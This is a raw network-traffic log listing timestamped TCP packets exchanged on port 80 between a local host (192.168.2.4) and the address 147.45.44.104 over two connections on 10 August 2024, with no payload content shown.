Aug 10, 2024 16:12:24.743798018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.743803978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.743829966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.743860960 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.743870020 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.743891954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.743925095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.743932962 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744026899 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744035006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744065046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744116068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744117975 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744148016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744196892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744210005 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744229078 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744267941 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744293928 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744323969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744340897 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744357109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744364023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744389057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744438887 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744441986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744508982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744529009 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744541883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744579077 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744590044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744595051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744642973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744652033 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744676113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744707108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744715929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744740963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744772911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744826078 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744826078 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744827986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744862080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744894028 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744910002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744927883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744930029 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744959116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.744976997 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.744992018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745023012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745037079 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745055914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745060921 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745088100 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745100975 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745120049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745151997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745166063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745183945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745193005 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745215893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745243073 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745249033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745266914 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745280027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745285034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745311975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745362043 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745378971 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745414019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745425940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745448112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745477915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745492935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745850086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745877981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745920897 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745929003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745929003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745963097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.745976925 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.745994091 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746017933 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746046066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746054888 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746095896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746104002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746126890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746140957 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746160030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746174097 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746208906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746237993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746242046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746247053 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746273994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746283054 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746304989 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746311903 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746336937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746368885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746383905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746404886 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746417999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746463060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746469975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746503115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746517897 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746536016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746542931 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746567011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746582985 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746601105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746625900 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746632099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746659994 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746665001 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746668100 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746695995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746706009 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746758938 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.746967077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.746999979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747015953 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747055054 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747059107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747097969 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747108936 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747158051 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747158051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747190952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747199059 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747222900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747243881 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747256041 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747256994 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747289896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747320890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747337103 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747356892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747374058 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747421980 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747451067 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747463942 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747469902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747520924 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747536898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747587919 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747589111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747620106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747627974 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747652054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747665882 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747682095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747701883 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747729063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747733116 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747761011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747771978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747792959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747807980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747824907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747848034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747855902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747886896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747903109 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747920036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747942924 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747951984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747966051 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.747982979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.747991085 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.748016119 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.748044968 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.748048067 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.748080969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.748094082 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.748111963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.748120070 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.748143911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.748167992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.748174906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.748198986 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.748209953 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.748240948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.748246908 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.748267889 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.748272896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.748305082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.748318911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.748318911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.748336077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.748343945 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.748466969 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.763516903 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.763552904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.763603926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.763634920 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.763634920 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.763636112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.763659000 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.763669014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.763703108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.763751984 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.763773918 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.763773918 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.763801098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.763849020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.763880968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.763892889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.763906956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.763914108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.763945103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.763959885 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.763977051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764029026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764039993 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764039993 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764079094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764113903 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764127970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764178991 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764183044 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764209986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764259100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764266014 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764290094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764338970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764367104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764396906 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764396906 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764414072 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764421940 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764445066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764472961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764503002 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764528990 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764555931 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764588118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764619112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764652014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764682055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764707088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764707088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764707088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764714003 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764765978 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764801025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764806986 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764815092 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764832020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764864922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764898062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764911890 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764911890 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764933109 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.764947891 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.764981031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765028954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765059948 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765091896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765113115 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765113115 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765140057 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765173912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765204906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765238047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765274048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765275955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765275955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765275955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765275955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765311003 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765340090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765369892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765402079 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765433073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765461922 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765461922 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765461922 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765481949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765491962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765513897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765563965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765572071 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765572071 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765592098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765607119 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765640974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765691042 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765739918 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765768051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765768051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765789032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765805960 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765842915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765876055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765924931 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.765929937 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765929937 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.765958071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766033888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766040087 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766068935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766079903 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766099930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766108990 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766133070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766165018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766195059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766222954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766252995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766274929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766274929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766274929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766274929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766285896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766316891 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766326904 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766349077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766381979 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766382933 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766407967 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766416073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766448021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766460896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766462088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766499043 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766530037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766556978 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.766561031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.766592026 CEST	80	49740	147.45.44.104	192.168.2.4
